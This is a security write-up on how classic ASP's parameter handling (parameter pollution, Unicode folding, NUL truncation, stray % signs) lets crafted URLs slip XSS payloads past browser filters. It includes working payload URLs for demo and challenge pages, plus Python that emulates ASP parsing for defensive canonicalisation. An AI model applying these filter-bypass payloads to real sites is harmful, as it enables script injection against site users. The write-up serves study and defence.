
Some ASP features used in XSS - Website Security - 自学php


<!DOCTYPE html > <html> <body> <h1>This page is vulnerable to XSS!</h1> <pre> Inputs: - Get: ?input1=something </pre> <div>Input1=111</div> </body> </html>


<!DOCTYPE html> <html> <body> <h1>This page is vulnerable to XSS!</h1> <pre> Inputs: - Get: ?input1=something </pre> <div>Input1=111, 222</div> </body> </html>

In this case, construct an XSS payload:

http://www.sdl.me/xssdemo/getxss.asp?input1=%3Cscript/&&input1=FOOBAR&input1=%3Ealert('@IRSDL');%3C/script%3E


<!DOCTYPE html> <html> <body> <h1>This page is vulnerable to XSS!</h1> <pre> Inputs: - Get: ?input1=something </pre> <div>Input1=<script/, >alert('@IRSDL');</script></div> </body> </html>

In testing, this bypassed the XSS filter of IE 10 but not that of Chrome.


www.sdl.me/xssdemo/getxss.asp?input1=<script/&in%u2119ut1=>al%u0117rt('@IRSDL')</script/


<!DOCTYPE html> <html> <body> <h1>This page is vulnerable to XSS!</h1> <pre> Inputs: - Get: ?input1=something </pre> <div>Input1=<script/, >alert('@IRSDL')</script/</div> </body> </html>

This one bypassed both Chrome and IE 10. Payloads that pass both the XSS1 and XSS2 challenges:

http://sdl.me/challenge1/xss1/JsChallenge1.asp?I%%NPUT2=Somet%%hing&iN%%PUT2=')1&inP%%UT2%00%00=1};lt=1;1&In%u2119ut2=1%26<1&input2=0<ale%%rt(/AWESOME_IRSDL/&in%u2119U%%T2%00%00%0%%0%00%0%%0=1);1&in%u2119uT%%2%00=1;i%%f(0&in%u2119ut2%%=1){{1&I%%n%%PuT2%00%00%00=1/%%*%%/&iN%%p%%Ut2=1/%%/

http://sdl.me/challenge1/xss1/JsChallenge1.asp?I%%NPUT2=Somet%%hing&iN%%PUT2=')1&inP%%UT2%00%00=1};lt=1;1&In%u2119ut2=1%26%3C1&input2=0%3Cale%%rt(/AWESOME_IRSDL/&in%u2119U%%T2%00%00%0%%0%00%0%%0=1);1&in%u2119uT%%2%00=1;i%%f(0&in%u2119ut2%%=1){{1&I%%n%%PuT2%00%00%00=1/%%*%%/&iN%%p%%Ut2=1/%%/

Principles:

1. ASP's HTTP Parameter Pollution (HPP) behaviour: ASP accepts the same parameter several times and, as in the example above, concatenates the values (the response shows "111, 222").
2. UTF-8 (Unicode) characters are converted to ASCII characters, in parameter names as well as values. For example, [inPut1=<scriPt/>] is equivalent to [%u0131n%u2119ut1=%u3008scr%u0131%u2119t>].
3. Parameter names in ASP are case-insensitive: input1 is equivalent to InPuT1.
4. In both parameter names and values, everything after a NULL byte is ignored: [input1=test] is equivalent to [input1%00Something=test%00Anything].
5. In parameter names and values, a % that is not followed by valid hexadecimal is ignored: [input1=test] is equivalent to [%input1%=t%%est%].
6. If the parameter name after an & is not followed by =, ASP does not treat it as a separate parameter: in [?&input1=test] the parameter name is &input1 with value test, and in [?&input1&input1=test] the parameter name is &input1&input1.
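The six rules above describe an impedance mismatch: a filter that inspects each URL parameter on its own sees something different from what the ASP page concatenates. The following Python model, added here as an example and not part of the original post or of ASP itself, emulates those six rules (HPP joining with ", ", case-insensitive names, NUL truncation, stray % ignored, %uXXXX folding, and the "no = means no separate parameter" behaviour) so that a defender can compute the backend's view of a raw query string and run detection over that view instead of over the raw fragments. The Unicode folding table covers only the code points used on this page; the real IIS mapping is broader, and the exact decoding order is an assumption.

```python
import re
import string
from urllib.parse import unquote

# Look-alike folding for the %uXXXX code points used in the page's examples.
# Assumption: IIS folds a much larger set; only these four are modelled here.
UNICODE_FOLD = {
    "\u0131": "i",  # dotless i
    "\u2119": "P",  # double-struck capital P
    "\u0117": "e",  # e with dot above
    "\u3008": "<",  # left angle bracket
}


def _is_hex(s: str, n: int) -> bool:
    return len(s) == n and all(c in string.hexdigits for c in s)


def asp_decode(token: str) -> str:
    """Decode one parameter name or value the way the page describes ASP doing it:
    %XX -> byte, %uXXXX -> folded ASCII look-alike (rule 2), a '%' not followed
    by valid hex is dropped (rule 5), '+' -> space, and everything after the
    first NUL is discarded (rule 4). Emulation, not ASP's real parser."""
    out = []
    i = 0
    while i < len(token):
        ch = token[i]
        if ch == "+":
            out.append(" ")
            i += 1
        elif ch == "%":
            if _is_hex(token[i + 1:i + 3], 2):
                out.append(chr(int(token[i + 1:i + 3], 16)))
                i += 3
            elif token[i + 1:i + 2] == "u" and _is_hex(token[i + 2:i + 6], 4):
                u = chr(int(token[i + 2:i + 6], 16))
                out.append(UNICODE_FOLD.get(u, u))
                i += 6
            else:
                i += 1  # rule 5: a stray '%' is silently ignored
        else:
            out.append(ch)
            i += 1
    return "".join(out).split("\x00", 1)[0]  # rule 4: NUL truncates


def asp_querystring(raw: str) -> dict:
    """Return {lower-cased name: joined value} as the ASP page would see it.
    Rule 6: an '&'-segment without '=' is glued onto the next segment's name.
    Rule 1 (HPP): repeated names are joined with ', '.  Rule 3: names are
    compared case-insensitively."""
    query = raw.split("?", 1)[1] if "?" in raw else raw
    params = {}
    pending = ""
    for seg in query.split("&"):
        if "=" not in seg:
            pending += seg + "&"
            continue
        name, value = (pending + seg).split("=", 1)
        pending = ""
        key = asp_decode(name).lower()
        val = asp_decode(value)
        params[key] = params[key] + ", " + val if key in params else val
    return params


# A complete <script ...> tag; the page's payloads only form one after joining.
SCRIPT_TAG = re.compile(r"<script[^>]*>", re.I)


def naive_flags(raw: str) -> bool:
    """Per-fragment filter: URL-decode each '&'-segment on its own and look for
    a complete script tag. This is the view the page's payloads are built to evade."""
    query = raw.split("?", 1)[1] if "?" in raw else raw
    return any(SCRIPT_TAG.search(unquote(seg)) for seg in query.split("&"))


def backend_flags(raw: str) -> bool:
    """Same check, run over the values the ASP page will actually concatenate."""
    return any(SCRIPT_TAG.search(v) for v in asp_querystring(raw).values())


if __name__ == "__main__":
    # The two request URLs shown on this page.
    for url in (
        "http://www.sdl.me/xssdemo/getxss.asp?input1=%3Cscript/&&input1=FOOBAR"
        "&input1=%3Ealert('@IRSDL');%3C/script%3E",
        "www.sdl.me/xssdemo/getxss.asp?input1=<script/&in%u2119ut1=>al%u0117rt('@IRSDL')</script/",
    ):
        print(asp_querystring(url), "naive:", naive_flags(url), "backend:", backend_flags(url))
```

Running it prints the exact `Input1=...` strings shown in the two responses above, and shows that the per-fragment check reports nothing for either URL while the check over the joined backend view fires. The practical lesson for a WAF or input-validation layer in front of classic ASP is to canonicalize to the backend's view (including the case folding, NUL truncation and %u handling) before matching.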
